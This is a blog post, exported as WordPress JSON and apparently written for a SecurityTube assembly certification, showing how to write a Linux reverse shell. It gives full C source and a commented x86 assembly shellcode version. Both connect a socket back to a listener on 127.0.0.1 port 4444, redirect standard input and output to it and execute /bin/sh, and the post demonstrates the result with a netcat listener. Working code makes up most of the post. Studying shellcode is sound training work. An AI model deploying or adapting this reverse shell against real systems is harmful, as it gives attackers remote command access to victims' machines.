{"id":261,"date":"2020-08-24T00:00:17","date_gmt":"2020-08-24T00:00:17","guid":{"rendered":"https:\/\/badbit.vc\/?p=261"},"modified":"2020-09-02T20:21:01","modified_gmt":"2020-09-02T20:21:01","slug":"writing-a-reverse-shell-in-x86-assembly-language","status":"publish","type":"post","link":"https:\/\/badbit.vc\/index.php\/2020\/08\/24\/writing-a-reverse-shell-in-x86-assembly-language\/","title":{"rendered":"Writing a Reverse Shell in x86 Assembly Language"},"content":{"rendered":"\n

A reverse shell is a connection established from the victim’s system to the attacker controlled system over a specific port. The major difference between a bind shell and a reverse shell lies in the flow of connection.<\/p>\n\n\n\n

In this blog post, we will create a reverse shell leveraging the ASM code from the previous post<\/a>.<\/p>\n\n\n\n

Following is a simple reverse shell in C:<\/p>\n\n\n\n

#include <stdio.h>\n#include<sys\/socket.h>\n#include <sys\/types.h>\n#include <netinet\/in.h>\n#include<unistd.h>\n\n#define remote_addr \"127.0.0.1\" \/\/ IP Address to connect back \n#define remote_port 4444  \/\/Port to connect back\n\nint socket_d;\nint socket_d_peer; \nstruct sockaddr_in sockstruct;\n\nint main()\n{\n\n\t\/\/int socket_d = socket(domain, type, protocol)\n\tint socket_d = socket(AF_INET, SOCK_STREAM, 6);\n\n\tsockstruct.sin_family = AF_INET;\n\tsockstruct.sin_port = htons(remote_port);\n\tsockstruct.sin_addr.s_addr = inet_addr(remote_addr);\n\n\tconnect(socket_d, (struct sockaddr*) &sockstruct, sizeof(sockstruct));\n\n\/\/\tlisten(socket_d, 2);\n\/\/\tprintf(\"Listening\\n\");\n\n\/\/\tsocket_d_peer = accept(socket_d, NULL, NULL);\n\n\tdup2(socket_d, 0); \/\/STDIN\n\tdup2(socket_d, 1); \/\/STDOUT\n\tdup2(socket_d, 2); \/\/STDERR\n\n\texecve(\"\/bin\/sh\", NULL, NULL);\n\tclose(socket_d);\n\n    return 0;\n}\n<\/code><\/pre>\n\n\n\n
The above code once compiled and executed will connect back to localhost on port 4444 as seen below:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
And following a similar fashion as in the previous post where we described a bind shell, we write a ASM quivalent of the above reverse shell.
Below is the commented x86-ASM code.<\/p>\n\n\n\n
; Syscalls - cat \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.h\n; Call numbers for socketcall -- \/usr\/include\/linux\/net.h\n\nglobal _start\n\nsection .text\n_start:\n\nsock:\n\t; creating a socket syscall\n\n\txor eax, eax\n\txor ebx, ebx\n\txor ecx, ecx\n\n\tmov bl, 0x1\n\n\tpush ecx\n\tpush ebx\n\tpush 0x2\n\tmov ecx, esp\n\n\tmov al, 0x66\n\tint 0x80\n\n\tmov esi, eax ; Saving socket for further use\n\n\t; creating a connect function\n\n\t; connect(socket_d, (struct sockaddr*) &sockstruct, sizeof(sockstruct))\n\n\tmov al, 0x66\n\n\t; creating a sockaddr structure\n\n\txor ebx, ebx\n\n\tpush 0x0101017f ; IP address (127.0.0.1)\n\tpush word 0x5c11 ; Port (4444)\n\tpush word 0x2 ; AF_INET\n\n\tmov ecx, esp\n\n\tpush 0x10 ; Size of sockstruct\n\tpush ecx ; Sockstruct from stack\n\tpush esi ; Earlier saved socket\n\n\tmov ecx, esp\n\n\tmov bl, 0x3\n\tint 0x80\n\n\t; piping output to our socket\n\n\tmov ebx, esi\n\tmov ecx, 0x3\n\npipe:\n\n\tmov al, 0x3f\n\tdec ecx\n\tint 0x80\n\n\tinc ecx\n\tloop pipe\n\n\t; execve syscall\n\n\txor ecx, ecx\n\tmov edx, ecx\n\t\n\t; Null terminated \/bin\/bash in Little Endian format\n\tpush ecx\n\tpush 0x68732f2f\n\tpush 0x6e69622f\n\tmov ebx, esp\n\n\tmov al, 0xb\n\tint 0x80\n\n\t; Exit\n\n\txor eax, eax\n\tmov al, 0x1\n\tint 0x80\n<\/code><\/pre>\n\n\n\n
We compile and link our shellcode, set up our netcat listener on port 4444 and execute our reverse shell.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
And that’s it folks! We have a reverse shell up and running!<\/p>\n\n\n\n
\n\n\n\n
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/<\/a><\/p>\n\n\n\n
Student ID: PA-14690<\/p>\n\n\n\n
Reverse shell Github Repo<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
A reverse shell is a connection established from the victim’s system to the attacker controlled system over a specific port. The major difference between a bind shell and a reverse shell lies in the flow of connection. In this blog post, we will create a reverse shell leveraging the ASM code from the previous post….<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[7,5,8,6],"class_list":["post-261","post","type-post","status-publish","format-standard","hentry","category-shellcoding","category-slae-x86","tag-linux","tag-shellcode","tag-slae","tag-x86"],"_links":{"self":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/261","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/comments?post=261"}],"version-history":[{"count":7,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/261\/revisions"}],"predecessor-version":[{"id":324,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/261\/revisions\/324"}],"wp:attachment":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/media?parent=261"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/categories?post=261"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/tags?post=261"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}